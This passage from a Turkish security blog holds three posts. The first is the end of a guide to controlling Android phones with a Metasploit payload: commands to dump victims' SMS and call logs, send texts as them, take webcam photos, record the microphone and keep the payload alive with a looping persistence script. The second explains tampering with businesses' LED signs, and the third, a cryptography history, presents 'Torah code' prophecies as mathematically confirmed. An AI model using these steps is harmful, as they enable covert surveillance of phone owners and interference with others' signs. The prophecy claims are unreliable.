  4. set LPORT 1604
  5. exploit
3. maddede yine local ya da dış ip adresimizi giriyoruz. 4. maddede ise port numarasını giriyoruz tekrar. Son olarakexploit diyerek oluşturduğumuz payloadı dinlemeye başlıyoruz. Dosyayı açan kurbanlar burada birer birer listelenecek.
payload seçimi ve ayarları
Bağlantı geldiğinde aşağıdaki görselde ilk sütundaki gibi bir yazı ile karşılaşacaksınız. Bağlantı koptuğunda ise bir altındaki sütunla…
 
Exploit

 

 “help” komutunu girerek neler yapabileceğinizin detaylı bir dökümüne ulaşabilirsiniz.Birkaç can alıcı komutu aşağıya yazayım.
 
check_root : Cihaz rootlu mu onu gösterir.
dump_sms : Telefondaki tüm smsleri toplar.
dump_calllog : Tüm arama kayıtlarını toplar.
send_sms : İstediğiniz bir numaraya telefon sahibi adına sms gönderebilirsiniz.
wlan_geolocate : Bağlı olduğu wifi ağına ait adresi bulabilirsiniz.
webcam_snap : Telefon kamerasından anlık bir fotoğraf çekerek bunu bilgisayarınıza kaydedebilirsiniz.
record_mic : Anlık ses kaydı toplayabilirsiniz.  
 
Ek olarak istediğiniz bir komuta dair yardım da alabilirsiniz. Örneğin “record_mic -h” yazarak bu komut ile başka neler yapabildiğinizi görebilirsiniz.

Kurban uygulamayı kapatsa dahi arkaplanda uygulamayı çalıştırarak takip etmeye devam etmek isterseniz aşağıdaki kodu bir txt dosyasına kaydedin ve uzantısını “.sh” olarak kaydedin. Daha sonra karşı telefona yükleyin. Bunu“help” yardımı ile gördüğünüz komutlardan birisi ile halletmeniz mümkün.

— — — — — — — — — —
#!/bin/bash
while true
do am start — user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done
— — — — — — — — — —
Tüm bunları yaptıktan sonra terminale shell yazın ve dosyayı yüklediğiniz konuma giderek “sh dosyaismi.sh”yazarak çalıştırın. Bundan sonra uygulama kapansa da siz istediğiniz işlemleri yapmaya devam edebilirsiniz.
Kategoriler
Siber Güvenlik Teknoloji

LED Tabelalar Nasıl Hacklenir?

ImageTeknoloji gelişiyor, bilişim her yere el atıyor. Günlük hayatta her yerde ucuz reklam yöntemi olan led tabelaları görüyoruz. Aşırı renkli, yersiz kullanılırsa itici, nihayetinde ben buradayım diyen bir reklam panosu her biri. Tabii bunun otobüslerde, belediyelerde, hava alanlarında kullanılan çeşitleri de söz konusu. Bu yazıda o tabelaların nasıl hacklendiğinden söz edeceğim.
 
Led tabelalar genelde iki çeşittir.

1-) Kablosuz Led Tabelalar

Image
Bu tabelalara bağlantı bluetooth üzerinden sağlanır. Aslına bakarsak muhteşem bir kolaylık. Ancak bu eksikliği de beraberinde getiriyor. Bu cihazlara bağlanarak değiştirmek ve kapatmak mümkün. Kapatmak için sizinle bir mobil uygulama paylaşacağım. Etraftaki cihazları arayıp, istediğiniz bluetooth sistemli led tabelayı kapatabilirsiniz.
 

2-) USB ile çalışan Led tabelalar

 
Image
Bir de online bağlantısı olmayan tabelalar mevcut. Çevrenizdeki dükkanların neredeyse hepsi bu sistemi kullanırlar. Önceden programla hazırlanan dosya, usb disk aracılığı ile tabelaya yüklenir ve dosyadaki yazı belirlenen biçimde tabelada yer alır.
 

 

 

Peki biz bunları nasıl hackleyeceğiz?Image

Aslında bu yapılana hack demeyelim de müdahale etmek diyelim.
USB disk ile çalışan Led tabelalardan söz edecek olursak, dikkat ederseniz mutlaka rastlarsınız, bu tabelaların bir kenarından USB girişi olan bir kablo sarkar. Şayet dükkanın içine yerleştirilmediyse rahatça görürsünüz. Siz kendi USB diskinize aşağıdaki programla yeni led yazısını yükledikten sonra tabelada girişe taktığınızda ekranda Loading ifadesi belirir. Bu yazının ardından sizin yazınız ekrana yansıyacaktır. Daha sonra diskinizi çıkarıp bir kenara çekilebilirsiniz.
 
PowerLED programı işinize yarayacaktır. PowerLED indirmek ve öğrenmek için buraya tıklayın.
 
Peki ya kablosuz ise ne yapacağız? Orada da size bir mobil uygulama önereceğim.Ancak yalnızca Android için paylaşacağım. IOS için bir çözüm var mı bilmiyorum doğrusu.Görseldeki gibi oldukça basit bir mantıkla çalışan bir mobil uygulama mevcut. Bluetooth ile tabelaya bağlanarak sizin istediğiniz mesajı bırakmanızı sağlıyor. Tabelanın sinyallerine müdahale ediyor. İndirmek için buraya tıklayın. Ancak yolda sokakta her tabelaya çekmeyen telefon hattı gibi yapıştırıp “Eee, bu çekmiyor kardeşim, kafa mı yapıyorsun?” demeyin. Daha önce de dediğim gibi bluetooth ile bağlanıp bağlanmadığından emin olmanız gerekiyor. Sizin karşılaştığınız tabela usb disk ile çalışan fakat kablo bağlantısı açıkta olmayan bir yer de olabilir. Önce bundan emin olmanız gerek.
 
Kategoriler
Siber Güvenlik

Tarih Öncesinden Bugüne : Kriptografi

Kriptografi dediğimiz şey bir metnin, bir mesajın,ya da herhangi bir şeyin şifrelenmesi, gizlenmesi ve başkalarının eline geçmemesini sağlamak desek yanlış olmaz sanıyorum. E tabii ayrıca bu şifreli metnin çözülmesi de bu alana giriyor. Tarih boyunca gizli saklı belgeler, şifrelemeler, şifreli metinler insanların hep merak konusu olmuştur. Uygarlık belirli bir seviyeye geldiği anda kriptografi de ilk adımlarını atmaya başladı. Matematiğin çıkışı ile depara kalkan şifreleme, teknolojinin nimetlerinden de faydalanıyor. Şu anda politika, hukuk, askeri iletişim ve istihbarat, mühendislik, yönetim, bilgisayar ve matematik gibi alanlarda şifrelemeyi sürekli olarak kullanıyoruz.

Kriptografide temel mantık şudur, Bir metin şifrelenir, şifreli metin karşı tarafa gönderilir.Sonrasında karşı tarafla belirlenen anahtar ile metin çözülür.Nihayetinde metin başka ellere geçmez.Şifreli metne “encryption”, şifreyi kırmaya ise “code breaking” diyebiliriz.

Image

Siber uzayda akla ilk gelenler ise Sezar, MD2, MD4, MD5,RSA, Lucifer diyebiliriz.Bu sıralama ciddi anlamda uzatılabilir.

Aslında en gerilere gidersek kriptografinin izlerini  MÖ 1900 yılında Rosetta Tableti’nde bulmak mümkün.Mısır yakınlarında Napolyon’un askerleri tarafından bulunan tablet üç bölüme ayrılmış.Üst bölüm hiyeroglif, ortadaki halk dilinde, alt kısım ise Yunanca hazırlanmış.Aslında tablette gizli bir bilgi yok.Ancak simgeler şeklinde yazılmasından ötürü şifreli kabul edilmiş ve çözülmesi bir hayli uğraştırmış.

Image

Yöntemlerden biri steganografi ise benim çok ilgimi çekti.Aslında oldukça basit ama gerçekten oldukça mantıklı.MÖ 1500 yıllarında ayrı bir bilim dalıymış bu.Metin şifreli değil ancak saklanmış bir biçimde oluyor.O dönemin kölelerinin saçları kazıtılıyor, mesaj kafasına yazılıyor.Daha sonra saçlarının çıkması bekleniyor.Ve karşı tarafa gönderiliyor.Karşı tarafta saçlar tekrar kesiliyor ve mesaj ortaya çıkıyor.Mantıklı ancak oldukça zaman isteyen bir süreç.

Gizli mürekkeple yazılan mesajlar, kağıt ısınmadan ortaya çıkmayan metinler , kimyasal işlemler ile açığa çıkan iletiler…2. Dünya Savaşı sırasında Almanlar, mektupların satır aralarına görünmez mürekkep ile mesajlar yazmışlar.Aynı şekilde moda dergilerinin görsellerine mors alfabesi ile metinler saklamışlardır.İngilizlerin sansürlerine rağmen bu mesajlar ile çok önemli sırlar yerlerine ulaşmış.

Bu yöntemin günümüzdeki hali ise resimlere, seslere, yazılara saklanan memsajlardır.Şu anda kolayca ulaşılan programlar ile bir görsele mesaj saklamak mümkün.Ses dosyalarına veri gizlemek mümkün.

Dini alanda da şifrelemelere dair teoriler görmek mümkün.Örneğin Tevrat’ın şifresinin bir matematikçi tarafından çözüldüğü bir dergide yayınlanmış ve matematikçiler bunu onaylamıştır.İzak Rabin’in öldürüleceği kehanetini o kaynaklardan bulup onu uyaran yazarın, belirttiği şekilde suikastin gerçekleşmesi de oldukça ilginç.Oklahoma’da Federal binasının bombalanması, 2.Dünya Savaşı, Körfez Savaşı, Netanyahu başbakanlığı ve birçok olay ayrıntıları ile şifrelenmiştir.Aynı şekilde Tevrat, kıyametin nükleer savaş ile geleceğini şifreli bir şekilde belirtmiştir.Domuz Ağılı yöntemi ile ızgaralar yani kareler ile bazı kelimelerin karşılığı bulunmuş ve masonlar bunu sık sık kullanmış.

Image

Yine sevdiğim yöntemlerden birisi ise Scytale yöntemi.MÖ 475 yılında bir metin silindire sarılı bir kağıda yazılırmış.Şerit, silindirden ayrıldığında çok bir şey ifade etmezmiş.Ancak aynı yarıçapa sahip bir silindire sarılırsa şifre öğrenilirmiş.

Gelelim Sezar yöntemine.MÖ 100’lü yıllara dayansa da hala kullanıyoruz.Julius Sezar, habercisine güvenmediği için her harfin alfabede üç sonrasına gelen harfi yazarak bir metin hazırlar ve bunu karşı tarafa gönderirmiş.Modüler aritmetik  tabanlı şifrelemenin de babası diyebiliriz.

Bir yöntem daha…Çok Alfabeli Şifreleme. Bu yöntemde ise bir kelime üzerinden sezar mantığı uygulanmıştır.Örneğin anahtar kelimemiz LİMON. Şimdi aşağıdaki metni şifrelemeli.

SALDIRI ŞAFAKTA

LİMONLİ MONLİMO

FİASVES ĞOŞLUHO

Yukarıdaki “Saldırı Şafakta” mesajının altına limon yazdık.Aradaki harf sayısı ne kadar ise alfabede o sıradaki harfi seçerek yazdık.Böylece metin LİMON anahtarı ile şifrelendi.

Image

ENIGMA…2 Dünya Savaşı’nın erken bitmesine sebep olan olayın anahtarından söz ediyoruz.Adına filmler çekilen yöntem.Bir şifreleme makinesi…Almanlar tarafından kullanılmış ve kolay olması, asla kırılamayacağı iddia edilmesi üzerine çok yaygın kullanılmış.Ancak şifre kırılmış.Polonyalılar bu makineyi ele geçirmiş ve İngilizler ile paylaşmış.İngiliz matematikçiler, kriptograflar, satranç oyuncuları bu makinenin kırılması için açılan okulda beraber çalışarak bu sistemi kırmaya çalışmıştır.

Ancak nihayetinde 1941’de kod kitabı, işletim el kitabı ele geçrilmiş ve bu bilgiler ile Enigma çözülmüş.1991 yılına kadar tüm dünyadan saklanan bu olay, şifrelemeyi çözen ülkelerin saklamasının ve gizlice mesajlaşmaları takip etmeye devam etmesinin ne kadar faydalı olduğunun göstergesi olsa gerek.
Örneğin, 1. Dünya Savaşı’nda Almanya dış işleri sekreteri, her heceye belli kodlar vererek şifrelediği bir metni Alman Elçiliği’ne gönderirken İngiltere tarafından ele geçirilip çözülmesi arkasından Amerika da savaşa girmiştir.Çünkü bu metinde Meksika’ya ittifak çağrısı yapılmaktadır.Yani şifreli bir metnin çözülmesi savaşı farklı bir yere çekti.

Günümüzde de bu tekniklerin büyük kısmı kullanılmakta.Ancak elbette çok daha profesyonelce, matematik ve zeka dolu bir biçimde…Teknolojinin gelişmesi ile beraber farklı teknikler geliştirilebiliyor.Ancak bir o kadar da açıklar artıyor, şifrelemeye olan ihtiyaç ortaya çıkıyor.Bir başka yazımızda da güncel tekniklerden söz edebiliriz.Ne dersiniz?